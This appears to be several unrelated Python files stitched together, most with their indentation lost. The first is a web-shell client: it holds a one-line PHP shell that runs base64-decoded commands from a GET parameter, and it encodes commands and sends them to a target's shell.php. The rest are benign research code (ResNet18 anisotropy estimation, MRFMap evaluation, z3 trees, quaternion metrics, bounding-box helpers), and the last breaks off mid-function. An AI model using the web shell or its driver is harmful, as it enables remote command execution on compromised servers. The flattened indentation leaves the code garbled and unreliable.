#!/usr/bin/python2
import sys, urllib, base64
import requests
##Procedural slop and I know it... but gets 'er done
## LOL
## '<?php "$a" = base64_decode($_GET["a"]); echo "$a", shell_exec("$a"); ?>'
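## Illustrative example of what this script builds (the base URL below is made up):
## encoding the command "id" gives base64 "aWQ=", URL-encoding that gives "aWQ%3D",
## and prepending a base URL yields e.g.
##   http://target/shell.php?a=aWQ%3D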
encORdec="0" ## decode option not yet implemented
baseURL=""
line=""
is_base64ENC="0"
is_base64DEC="0" ##not yet implemented
is_URLencode="0"
is_URLdecode="0" ##not yet implemented
is_baseURL="0"
do_debugPrintLine = "0"
while encORdec != "1" and encORdec != "2":
encORdec=raw_input("Encode or decode?:\n[1] Encode\n[2] Decode\n")
if encORdec == "1":
is_base64ENC=1
# then might have to URL encode, and there might be a base URL.
while is_URLencode != "1" and is_URLencode != "2":
is_URLencode=raw_input("URLencode the b64?:\n[1] yes\n[2] no\n")
while is_baseURL != "1" and is_baseURL != "2":
is_baseURL=raw_input("Is there a base URL to put the encode onto?\n[1] Yes\n[2] No\n")
if is_baseURL == "1":
baseURL = raw_input("Give me the base URL:\n").rstrip()
if encORdec == "2":
## Not yet implemented, asshat!
print("._._.\n[x!x]\nVVVV\n^^^^\nNot yet implemented, asshat!")
sys.exit() ## because Not yet implemented, asshat!
while do_debugPrintLine != "1" and do_debugPrintLine != "2":
do_debugPrintLine=raw_input("Print decoded lines with output?:\n[1] Yes\n[2] No\n")
while line != "exit":
list=[]
line=""
userin="0"
req=[]
resp=[]
print("\n[!!] Give heredoc. End heredoc input with \"EOF\". Quit with \"exit\".:")
while line != "EOF" and line != "exit":
line=raw_input("")
if line != "EOF":
list.append(line)
for item in list:
str=""
pre=item
curr=""
post=""
if encORdec == "1":
str=base64.b64encode(item)
curr=str
if is_URLencode == "1":
tmp=str
str=urllib.quote_plus(tmp)
curr=str
if do_debugPrintLine == "1":
if is_URLencode == "1":
post=base64.b64decode(urllib.unquote_plus(str))
else:
post=base64.b64decode(str)
if is_baseURL == "1":
tmp=str
str=baseURL + tmp
# if encORdec == "2":
req.append(str)
print(str)
if do_debugPrintLine == "1":
print("\tpre: " + pre)
print("\tenc: " + curr)
print("\tdec: " + post)
if is_baseURL == '1':
userin=raw_input("GET request the URLs?:\n[1] Yes\n[2] No\n")
if userin == "1":
for item in req:
print(item)
headers = {'Accept-Encoding': 'identity'}
                r = requests.get(item, headers=headers)
resp.append(r.text)
# print("\tStatus code = " + str(r.status_code))
print "\t", r.status_code
userin = raw_input("Print the returned source code responses to GET requests sent?:\n[1] Yes\n[2] No\n")
if userin == "1":
for i in range(len(resp)):
print("\n\n\n\n\n\n")
print(req[i])
usin=raw_input("Print the response to this request?\n[1] Yes\n[2] No\n")
if usin == "1":
print(resp[i])
sys.exit()
|
import torch
import numpy as np
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from models import ResNet18
from nad_computation import GradientCovarianceAnisotropyFinder
DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'
def model_gen_fun():
model = ResNet18(num_classes=1, num_channels=1).eval()
return model
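# Note (an inference from the module/file names only, not from documentation):
# GradientCovarianceAnisotropyFinder presumably estimates the neural anisotropy
# directions (NADs) of the untrained architecture, i.e. eigenvectors of an
# input-gradient covariance accumulated over `num_networks` random initialisations,
# keeping the `k` leading directions for a 1x32x32 input.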
anisotropy_finder = GradientCovarianceAnisotropyFinder(model_gen_fun=model_gen_fun,
scale=100,
num_networks=10000,
k=1024,
eval_point=torch.randn([1, 32, 32], device=DEVICE),
device=DEVICE,
batch_size=None)
eigenvalues, NADs = anisotropy_finder.estimate_NADs()
np.save('../NADs/ResNet18_NADs.npy', NADs)
np.save('../NADs/ResNet18_eigenvals.npy', eigenvalues)
|
#!/usr/bin/env python
import numpy as np
from mrfmap_ros.GVDBPyModules import GVDBInference, GVDBImage, gvdb_params, GVDBMapLikelihoodEstimator, KeyframeSelector, GVDBOctomapWrapper, PangolinViewer
from mrfmap_ros.MRFMapRosPyModules import GVDBBatchMapCreator
from mrfmap_ros.ReadTemporalCorrectedBag import ReadTemporalCorrectedBag
from mrfmap_ros.MRFMapGenerator import MRFMapGenerator
import pdb
from geometry import se3, SE3
import click
import yaml
import os
import rospy
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
dtype = np.float32
# Script options!
config_dir = '../../config/'
main_dir = '/home/icoderaven/bagfiles/'
didx = 1 # Dataset ID 0,1, or 2
plot_timings = True
show_map = True # Visualise map in Mayavi. Might have to restart script afterwards because of memory shenanigans
closeup = True # Show the map in Mayavi from hand picked camera pose
num_repeats = 1 # Multiple repeats, if required for timing data std.dev.
datasets = ['aditya3', 'ICL', 'coffin_world_640', 'cactus_garden']
bagfiles = ['aditya3.bag', 'living_room_with_rgb_noise.bag', 'coffin_world_640.bag', 'cactus_garden.bag']
# Read config files
rs_config_files = [config_dir+'realsense_848.yaml', config_dir+'ICL.yaml',
config_dir+'coffin_world_640.yaml', config_dir+'cactus_garden.yaml']
kin_config_files = [config_dir+'kinectone_new.yaml', config_dir+'ICL_gt.yaml',
config_dir+'coffin_world_640_gt.yaml', config_dir+'cactus_garden_gt.yaml']
dataset = datasets[didx]
bagfile = bagfiles[didx]
rs_config_file = rs_config_files[didx]
kin_config_file = kin_config_files[didx]
path_str = main_dir + dataset + '/'
bag_file_path = main_dir + dataset + '/' + bagfile
topics_to_parse = []
scale_factors = []
img_lags = []
Ks = []
img_dims = []
bias_poly_files = []
sigma_poly_files = []
cam_in_bodys = []
kf_thresholds = []
use_octos = []
is_icl_bag = False
world_frame_transform = np.eye(4, dtype=dtype)
for config_file in [rs_config_file, kin_config_file]:
    with open(config_file) as f:
        node = yaml.load(f, Loader=yaml.SafeLoader)
viewer_node = node['viewer_params_nodes']
cam_in_bodys.append(
np.array(viewer_node['cam_in_body']).reshape(4, 4).astype(dtype))
topics_to_parse.append(viewer_node['camera_topic'])
topics_to_parse.append(viewer_node['odom_topic'])
scale_factors.append(viewer_node['img_scale_factor'])
img_lags.append(viewer_node['img_lag'])
kf_thresholds.append(
[viewer_node['rotation_thresh'], viewer_node['translation_thresh']])
use_octos.append(viewer_node['view_octomap'])
is_icl_bag = viewer_node['is_icl_bag']
if is_icl_bag:
world_frame_transform = np.array(viewer_node['world_frame_transform']).reshape(4, 4).astype(dtype)
gvdb_node = node['gvdb_params']
Ks.append(np.array(gvdb_node['K']).reshape(3, 3).astype(dtype))
img_dims.append([gvdb_node['rows'], gvdb_node['cols']])
bias_poly_files.append(gvdb_node['depth_bias_lookup'])
sigma_poly_files.append(gvdb_node['depth_sigma_lookup'])
# If the generated map already exists, ask whether to overwrite it; otherwise generate it.
generate_mrfmap = False
params = gvdb_params()
params.load_from_file(rs_config_file)
suffix = '_res_' + str(dtype(params.res)).replace('.', '_') + '_rot_' + \
str(dtype(kf_thresholds[0][0])).replace('.', '_') + '_trans_' + str(dtype(kf_thresholds[0][1])).replace('.', '_')
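# For example (values illustrative only): res=0.05 with rotation/translation keyframe
# thresholds of 0.1 gives suffix '_res_0_05_rot_0_1_trans_0_1', so the map below is
# saved as generated/mrfmap_res_0_05_rot_0_1_trans_0_1.npy (plus 'poly'/'noisy' when
# those options apply).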
if params.use_polys:
suffix += 'poly'
# Add special suffix for ICL
if topics_to_parse[0] == '/camera/depth/noisy_image':
suffix += 'noisy'
if os.path.exists(main_dir+dataset+'/generated/mrfmap' + suffix + '.npy'):
if raw_input('Overwrite mrfmap? y/n') in ['y', 'Y']:
generate_mrfmap = True
else:
generate_mrfmap = True
mrfmap = MRFMapGenerator(
rs_config_file, main_dir+dataset+'/generated/', 'mrfmap'+suffix)
if generate_mrfmap:
if plot_timings:
repeat = num_repeats
else:
repeat = 1
for i in range(repeat):
creator = GVDBBatchMapCreator(rs_config_file)
creator.load_bag(bag_file_path)
creator.process_saved_tuples()
mrfmap.inference = creator.get_inference_ptr()
print 'about to save mrfmap'
mrfmap.save_map()
print 'done!'
if show_map:
mrfmap.show_map(didx)
else:
if show_map:
mrfmap_npy = np.load(main_dir+dataset+'/generated/mrfmap'+suffix+'.npy')
mrf_like_estimator = GVDBMapLikelihoodEstimator(mrfmap.params, False)
mrf_like_estimator.load_map(mrfmap_npy[:, :3].astype(
dtype), mrfmap_npy[:, 3].astype(dtype))
mrfmap.inference = mrf_like_estimator
mrfmap.load_brick_data()
mrfmap.show_map(didx, 0.1, True, closeup)
if use_octos[0]:
if generate_mrfmap:
print 'Also saving octomap!'
# Save the generated octomap as well
mrfmap.inference = creator.get_octomap_ptr()
mrfmap.title = 'octomap'+suffix
mrfmap.save_map()
if show_map:
mrfmap.show_map(didx)
else:
if show_map:
octomap_npy = np.load(main_dir+dataset+'/generated/octomap'+suffix+'.npy')
octo_like_estimator = GVDBMapLikelihoodEstimator(mrfmap.params, False)
octo_like_estimator.load_map(octomap_npy[:, :3].astype(
dtype), octomap_npy[:, 3].astype(dtype))
mrfmap.inference = octo_like_estimator
mrfmap.title = 'octomap'+suffix
mrfmap.load_brick_data()
mrfmap.show_map(didx, 0.5, True, closeup)
raw_input('Done showing maps!!! Press any key to continue')
if generate_mrfmap:
time_str = creator.get_stats().split('\n')
types_to_time = ['inference', 'octomap']
means = []
stddevs = []
# Show timings
if plot_timings:
timing_fig = plt.figure()
for ttype in types_to_time:
# Pull out all the octomap vs mrfmap instances
entries = [t for t in reversed(time_str) if ttype in t]
# Pull out mean and std.dev
means.append(np.array([float(t.split('total=')[-1].split('s')[0]) for t in entries]))
stddevs.append(np.array([float(t.split('std. dev=')[-1].split('s')[0]) for t in entries]))
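        # (The parsing above assumes each matching line of get_stats() contains
        # 'total=<seconds>s' and 'std. dev=<seconds>s' substrings; if that format
        # changes, the float() conversions will raise ValueError.)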
# And save this as well
np.save(main_dir+dataset+'/generated/' + ttype + suffix + '_timings_means.npy', means)
np.save(main_dir+dataset+'/generated/' + ttype + suffix + '_timings_stddevs.npy', stddevs)
if plot_timings:
# Plot them?
plt.plot(means[-1], label=ttype)
plt.fill_between(range(means[-1].shape[0]), means[-1] - 3*stddevs[-1], means[-1] + 3*stddevs[-1], alpha=0.2)
plt.xlabel('Image index')
plt.ylabel('Time taken (s)')
plt.grid(True)
plt.legend()
plt.tight_layout()
if plot_timings:
plt.show()
if generate_mrfmap:
del creator
# Ok, great. Now remember all those poses and images we had loaded?
# Now create a new set of gvdb params for kinect
print 'Loading params from file!'
# Init gvdb params
old_params = params
params_config_file = kin_config_file
params = gvdb_params()
params.load_from_file(params_config_file)
# Sanity check
if not np.allclose(params.dims, old_params.dims):
print 'Map dimensions are not the same!!! Fix config file!'
raise SystemExit
if not np.allclose(params.res, old_params.res):
print 'Map resolutions are not the same!!! Fix config file!'
raise SystemExit
# Load map
mrfmap_npy = np.load(main_dir+dataset+'/generated/mrfmap' + suffix + '.npy')
mrf_like_estimator = GVDBMapLikelihoodEstimator(params, False)
mrf_like_estimator.load_map(mrfmap_npy[:, :3].astype(
dtype), mrfmap_npy[:, 3].astype(dtype))
octomap_npy = np.load(main_dir+dataset+'/generated/octomap' + suffix + '.npy')
octomap_like_estimator = GVDBMapLikelihoodEstimator(params, False)
octomap_like_estimator.load_map(octomap_npy[:, :3].astype(
dtype), octomap_npy[:, 3].astype(dtype))
estimators = [mrf_like_estimator, octomap_like_estimator]
estimator_labels = ['MRF', 'Octo']
# Read the bag file for kinect data
bag_reader = ReadTemporalCorrectedBag(
topics_to_parse, bag_file_path, img_lags, scale_factors, world_frame_transform)
bag_reader.read()
print 'Reading done! Computing accuracies...'
accs = []
compute_roc = False
simple_accs = [[], []]
accs_for_simple_accs = np.linspace(0.0, 1.0, 21)
with click.progressbar(range(len(bag_reader.kin_data)),
length=len(bag_reader.kin_data)) as bar:
for index in bar:
img = bag_reader.kin_data[index][0].astype(dtype)
pose = bag_reader.kin_data[index][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
acc = np.array([0., 0.])
for i, estimator in enumerate(estimators):
likeimg = np.zeros(img.shape, dtype=dtype)
accimage = np.zeros(img.shape, dtype=dtype)
# estimator.get_likelihood_image_at_pose_with_depth(pose_kinect, img, likeimg)
acc[i] = estimator.get_accuracy_image_at_pose_with_depth(pose_kinect, img, accimage)
if compute_roc:
simples = []
gvdb_img = GVDBImage(img)
for acc_thresh in accs_for_simple_accs:
estimator.set_acc_thresh(acc_thresh)
accimage = np.zeros(img.shape, dtype=dtype)
simples.append(estimator.get_simple_accuracy_at_pose(pose_kinect, gvdb_img))
simple_accs[i].append(simples)
accs.append(acc)
accs = np.array(accs)
# Add a little interactivity to see individual likelihood images
plt.close()
acc_fig = plt.figure()
nrows = len(estimators)+1
ax_data = plt.subplot2grid((nrows, 4), (0, 0), colspan=3, picker=True)
ax_depth_img = plt.subplot2grid(
(nrows, 4), (1, 0), colspan=1, title='Depth')
ax_like_imgs = []
ax_acc_imgs = []
ax_simple_acc_imgs = []
ax_like_imshow_handles = []
ax_acc_imshow_handles = []
ax_simple_acc_imshow_handles = []
test_img = np.random.rand(
bag_reader.kin_data[0][0].shape[0], bag_reader.kin_data[0][0].shape[1])
for i, estimator in enumerate(estimators):
ax_like_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 1), colspan=1, title=estimator_labels[i]+' Likelihood'))
ax_acc_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 2), colspan=1,
title=estimator_labels[i]+' Accuracy', picker=True))
ax_simple_acc_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 3), colspan=1,
title=estimator_labels[i]+' Simple Accuracy'))
ax_like_imshow_handles.append(ax_like_imgs[-1].imshow(test_img, interpolation='none', vmin=-7, vmax=7))
ax_acc_imshow_handles.append(ax_acc_imgs[-1].imshow(test_img, interpolation='none', vmin=-1, vmax=2))
ax_simple_acc_imshow_handles.append(ax_simple_acc_imgs[-1].imshow(test_img, interpolation='none', vmin=-1, vmax=2))
ax_depth_imshow_handle = ax_depth_img.imshow(
bag_reader.kin_data[0][0], interpolation='none', vmin=0, vmax=5.0)
ax_data.plot(accs[:, 0], label='MRFMap')
ax_data.plot(accs[:, 1], label='OctoMap')
ax_data.legend()
ax_data.set_title('Accuracies at {0}m'.format(str(dtype(params.res))))
pressed = False
selected_idx = -1
# Add slider for set_acc_thresh
ax_slider = plt.subplot2grid((nrows, 4), (nrows-1, 0), colspan=1)
acc_thresh_slider = Slider(ax_slider, 'set_acc_thresh', 0.0, 1.0, valinit=0.1, valstep=0.01)
def slider_update(val):
for i, estimator in enumerate(estimators):
img = bag_reader.kin_data[selected_idx][0].astype(dtype)
pose = bag_reader.kin_data[selected_idx][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
estimator.set_acc_thresh(val)
# Also update the simple accuracy image
simpleaccimage = np.zeros(img.shape, dtype=dtype)
estimator.get_simple_accuracy_image_at_pose_with_depth(
pose_kinect, img, simpleaccimage)
ax_simple_acc_imshow_handles[i].set_data(simpleaccimage)
acc_fig.canvas.draw()
def draw_at_idx(index):
global selected_idx
if index != selected_idx:
# Set the likelihood image to be the one computed at the corresponding index
img = bag_reader.kin_data[index][0].astype(dtype)
pose = bag_reader.kin_data[index][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
for i, estimator in enumerate(estimators):
accimage = np.zeros(img.shape, dtype=dtype)
simpleaccimage = np.zeros(img.shape, dtype=dtype)
likeimage = np.zeros(img.shape, dtype=dtype)
estimator.get_likelihood_image_at_pose_with_depth(
pose_kinect, img, likeimage)
estimator.get_accuracy_image_at_pose_with_depth(
pose_kinect, img, accimage)
estimator.get_simple_accuracy_image_at_pose_with_depth(
pose_kinect, img, simpleaccimage)
ax_acc_imshow_handles[i].set_data(accimage)
ax_simple_acc_imshow_handles[i].set_data(simpleaccimage)
ax_like_imshow_handles[i].set_data(likeimage)
ax_depth_imshow_handle.set_data(bag_reader.kin_data[index][0])
# Also display line corresponding to selected index
for obj_handle in ax_data.findobj(match=type(plt.vlines(0, 0, 0))):
obj_handle.remove()
ax_data.vlines(index, 0, 1.0, linestyles='dotted', alpha=0.8)
acc_fig.canvas.draw()
selected_idx = index
def onmove(event):
if pressed and event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
def onpress(event):
global pressed
if event.button == 1:
pressed = True
if event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
if event.inaxes in ax_acc_imgs:
indx_x = (event.xdata + 0.5).astype(np.int)
indx_y = (event.ydata + 0.5).astype(np.int)
estimators[0].set_selected_x_y(indx_x, indx_y)
def onrelease(event):
global pressed
if event.button == 1:
pressed = False
if event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
cid = acc_fig.canvas.mpl_connect('button_press_event', onpress)
rid = acc_fig.canvas.mpl_connect('button_release_event', onrelease)
mid = acc_fig.canvas.mpl_connect('motion_notify_event', onmove)
acc_thresh_slider.on_changed(slider_update)
draw_at_idx(0)
# plt.tight_layout()
plt.savefig(main_dir+dataset+'/generated/octomap' +
suffix + '_accuracies.pdf', bbox_inches='tight')
plt.show()
np.save(main_dir+dataset+'/generated/octomap' +
suffix + '_accuracies.npy', accs)
# TODO: Directly print latex table
# from tabulate import tabulate
print np.mean(accs, axis=0)
print np.std(accs, axis=0)
if compute_roc:
# Also show ROC-ish curve
fig = plt.figure()
simple_accs = np.array(simple_accs)
for i, blah in enumerate(estimator_labels):
means = np.mean(simple_accs[i], axis=0)
stddev = np.std(simple_accs[i], axis=0)
plt.plot(accs_for_simple_accs, means, label=estimator_labels[i])
plt.fill_between(accs_for_simple_accs, means - stddev, means + stddev, alpha=0.25, linewidth=0.0)
plt.legend()
plt.show()
# print 'Done! Dropping to pdb'
# pdb.set_trace()
rospy.signal_shutdown("Done!")
|
from z3 import *
CONNECTIVE_OPS = [Z3_OP_NOT,Z3_OP_AND,Z3_OP_OR,Z3_OP_IMPLIES,Z3_OP_IFF,Z3_OP_ITE]
REL_OPS = [Z3_OP_EQ,Z3_OP_LE,Z3_OP_LT,Z3_OP_GE,Z3_OP_GT]
OPERATORS = CONNECTIVE_OPS + REL_OPS
# var is tuple (type, name)
def createVar(var):
t = var[0]
n = var[1]
if t=="int":
return Int('%s' % n)
elif t=="bool":
return Bool('%s' % n)
elif t=="real":
return Real('%s' % n)
    raise NotImplementedError(t)
def createExpression(v, expr):
return eval(expr)
# creates a constraint which allows only the key variable to change
def createCounterConstraint(key, variables, model):
constraints = []
for k, v in variables.iteritems():
if k==key:
x = v
constraints.append(Not(x == model[x]))
else:
x = v
constraints.append(x == model[x])
return constraints
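# Sketch of intended use (illustrative only; assumes a satisfiable formula and the
# `variables` dict defined at the bottom of this file):
#   s = Solver()
#   s.add(expr)
#   if s.check() == sat:
#       m = s.model()
#       s.add(createCounterConstraint('A', variables, m))
#       # a second s.check() now looks for a model in which only A differs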
def modelToDict(model):
return {x.name():model[x] for x in model}
def pPrintDict(d):
res = ""
for k, v in sorted(d.items()):
res += "{} : {}, ".format(k, v)
    return res[:-2]
def block_model(s):
m = s.model()
s.add(Or([ f() != m[f] for f in m.decls() if f.arity() == 0]))
class Node:
    def __init__(self, value):
        self.value = value
        self.left = None
        self.right = None

    def isOperand(self):
        node = self.value
        t = node.kind()
        return is_bool(node) and (is_var(node) or (is_app(node) and t not in OPERATORS))

    def isOperator(self):
        return not self.isOperand()
def __str__(self):
if self.value.decl() is not None:
return str(self.value.decl())
return str(self.value)
def insert(self, node):
if self.left is None:
self.left = Node(node)
for child in self.left.value.children():
self.left.insert(child)
elif self.right is None:
self.right = Node(node)
for child in self.right.value.children():
self.right.insert(child)
else:
self.left.insert(node)
def printTree(self, level=0, indent=0):
if level==0:
line = str(self)
indent = len(line)
else:
space = (level+indent) * ' '
dotted = level * '-'
line = "{}|{}{}".format(space, dotted, str(self))
#line = "{}|{}".format(space, str(self))
indent += len(str(self))
if self.right:
self.right.printTree(level+1, indent)
print line
if self.left:
self.left.printTree(level+1, indent)
# Returns root of constructed tree
def constructTree(variables, expr):
root = Node(expr)
print "constructing tree from ", expr
for child in expr.children():
root.insert(child)
s = Solver()
return root
variables = {x[1]:createVar(x) for x in [['bool','A'], ['bool','B'], ['bool','C']]}
expr = createExpression(variables, "And(Or(v['A'],v['B']), v['C'])")
r = constructTree(variables, expr)
r.printTree()
|
# Copyright (c) 2020, Michael Boyle
# See LICENSE file for details:
# <https://github.com/moble/quaternionic/blob/master/LICENSE>
import numpy as np
from . import jit, guvectorize, algebra, float64
from .utilities import ndarray_args
_divide = jit(algebra.divide)
_log = jit(algebra.log)
_absolute = jit(algebra.absolute)
def CreateMetrics(jit=jit, guvectorize=guvectorize):
class Rotor(object):
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def intrinsic(q1, q2, out):
"""Geodesic distance between rotors within the Spin(3)=SU(2) manifold.
This function is equivalent to
np.absolute(np.log(q1 / q2))
which is a measure of the "distance" between two quaternions. Note
that no normalization is performed, which means that if q1 and/or
q2 do not have unit norm, this is a more general type of distance.
If they are normalized, the result of this function is half the
angle through which vectors rotated by q1 would need to be rotated
to lie on the same vectors rotated by q2.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.chordal
quaternionic.distance.rotation.intrinsic
quaternionic.distance.rotation.chordal
"""
qtemp = np.empty(4)
_divide(q1, q2, qtemp)
_log(qtemp, qtemp)
_absolute(qtemp, out)
out[0] *= 2
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def chordal(q1, q2, out):
"""Euclidean distance between rotors.
This function is equivalent to
np.absolute(q1 - q2)
Note that no normalization is performed. If the quaternions are
normalized, this represents the length of the chord joining these
two points on the unit 3-sphere, considered as embedded in
Euclidean 4-space.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotation.intrinsic
quaternionic.distance.rotation.chordal
"""
out[0] = np.sqrt((q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2)
class Rotation(object):
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def intrinsic(q1, q2, out):
"""Geodesic distance between rotations within the SO(3) manifold.
This function is equivalent to
min(
np.absolute(np.log(q1 / q2)),
np.absolute(np.log(q1 / -q2))
)
which is a measure of the "distance" between two rotations. Note
that no normalization is performed, which means that if q1 and/or
q2 do not have unit norm, this is a more general type of distance.
If they are normalized, the result of this function is half the
angle through which vectors rotated by q1 would need to be rotated
to lie on the same vectors rotated by q2.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.chordal
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotation.chordal
"""
qtemp = np.empty(4)
a = (q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2
b = (q1[0]+q2[0])**2 + (q1[1]+q2[1])**2 + (q1[2]+q2[2])**2 + (q1[3]+q2[3])**2
if b > a:
_divide(q1, q2, qtemp)
else:
_divide(q1, -q2, qtemp)
_log(qtemp, qtemp)
_absolute(qtemp, out)
out[0] *= 2
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def chordal(q1, q2, out):
"""Euclidean distance between rotations.
This function is equivalent to
min(
np.absolute(q1 - q2),
np.absolute(q1 + q2)
)
Note that no normalization is performed. If the quaternions are
normalized, this represents the length of the chord joining these
two points on the unit 3-sphere, considered as embedded in
Euclidean 4-space.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotor.chordal
quaternionic.distance.rotation.intrinsic
"""
a = (q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2
b = (q1[0]+q2[0])**2 + (q1[1]+q2[1])**2 + (q1[2]+q2[2])**2 + (q1[3]+q2[3])**2
if b > a:
out[0] = np.sqrt(a)
else:
out[0] = np.sqrt(b)
return Rotor, Rotation
rotor, rotation = CreateMetrics()
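# Usage sketch (illustrative; assumes the public `quaternionic` package layout, where
# this module is exposed as quaternionic.distance):
#
#   import numpy as np, quaternionic
#   q1 = quaternionic.array([1.0, 0.0, 0.0, 0.0])              # identity rotor
#   q2 = quaternionic.array([np.cos(0.1), np.sin(0.1), 0, 0])  # small rotation about x
#   quaternionic.distance.rotor.intrinsic(q1, q2)       # ~0.2, but ~2*pi-0.2 for -q2
#   quaternionic.distance.rotation.intrinsic(q1, -q2)   # ~0.2 either way (sign-blind)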
|
games = ["chess", "soccer", "tennis"]
foods = ["chicken", "milk", "fruits"]
favorites = games + foods
print(favorites)
|
# --------------------------------------------------------
# Multitask Network Cascade
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# Copyright (c) 2016, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
import numpy as np
from utils.cython_bbox import bbox_overlaps
from mnc_config import cfg
def compute_targets(rois, overlaps, labels):
"""
Compute bounding-box regression targets for an image.
"""
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= cfg.TRAIN.BBOX_THRESH)[0]
    # Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(
np.ascontiguousarray(rois[ex_inds, :], dtype=np.float),
np.ascontiguousarray(rois[gt_inds, :], dtype=np.float))
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
def bbox_transform(ex_rois, gt_rois):
"""
Compute bbox regression targets of external rois
with respect to gt rois
"""
ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths
ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights
gt_widths = gt_rois[:, 2] - gt_rois[:, 0] + 1.0
gt_heights = gt_rois[:, 3] - gt_rois[:, 1] + 1.0
gt_ctr_x = gt_rois[:, 0] + 0.5 * gt_widths
gt_ctr_y = gt_rois[:, 1] + 0.5 * gt_heights
targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths
targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights
targets_dw = np.log(gt_widths / ex_widths)
targets_dh = np.log(gt_heights / ex_heights)
targets = np.vstack(
(targets_dx, targets_dy, targets_dw, targets_dh)).transpose()
return targets
def bbox_transform_inv(boxes, deltas):
"""
invert bounding box transform
apply delta on anchors to get transformed proposals
"""
if boxes.shape[0] == 0:
return np.zeros((0, deltas.shape[1]), dtype=deltas.dtype)
boxes = boxes.astype(deltas.dtype, copy=False)
widths = boxes[:, 2] - boxes[:, 0] + 1.0
heights = boxes[:, 3] - boxes[:, 1] + 1.0
ctr_x = boxes[:, 0] + 0.5 * widths
ctr_y = boxes[:, 1] + 0.5 * heights
dx = deltas[:, 0::4]
dy = deltas[:, 1::4]
dw = deltas[:, 2::4]
dh = deltas[:, 3::4]
pred_ctr_x = dx * widths[:, np.newaxis] + ctr_x[:, np.newaxis]
pred_ctr_y = dy * heights[:, np.newaxis] + ctr_y[:, np.newaxis]
pred_w = np.exp(dw) * widths[:, np.newaxis]
pred_h = np.exp(dh) * heights[:, np.newaxis]
pred_boxes = np.zeros(deltas.shape, dtype=deltas.dtype)
# x1
pred_boxes[:, 0::4] = pred_ctr_x - 0.5 * pred_w
# y1
pred_boxes[:, 1::4] = pred_ctr_y - 0.5 * pred_h
# x2
pred_boxes[:, 2::4] = pred_ctr_x + 0.5 * pred_w
# y2
pred_boxes[:, 3::4] = pred_ctr_y + 0.5 * pred_h
return pred_boxes
def clip_boxes(boxes, im_shape):
"""
Clip boxes inside image boundaries
"""
x1 = boxes[:, 0::4]
y1 = boxes[:, 1::4]
x2 = boxes[:, 2::4]
y2 = boxes[:, 3::4]
keep = np.where((x1 >= 0) & (x2 <= im_shape[1] - 1) & (y1 >= 0) & (y2 <= im_shape[0] - 1))[0]
clipped_boxes = np.zeros(boxes.shape, dtype=boxes.dtype)
# x1 >= 0
clipped_boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)
# y1 >= 0
clipped_boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)
# x2 < im_shape[1]
clipped_boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)
# y2 < im_shape[0]
clipped_boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)
return clipped_boxes, keep
def filter_small_boxes(boxes, min_size):
"""
Remove all boxes with any side smaller than min_size.
"""
ws = boxes[:, 2] - boxes[:, 0] + 1
hs = boxes[:, 3] - boxes[:, 1] + 1
keep = np.where((ws >= min_size) & (hs >= min_size))[0]
return keep
def scale_boxes(boxes, alpha):
"""
    Scale boxes from w/h to alpha * w/h while keeping the center unchanged
Args:
boxes: a set of boxes specified using x1, y1, x2, y2
alpha: scaling factor
Returns:
boxes: boxes after applying scaling
"""
w = boxes[:, 2] - boxes[:, 0] + 1
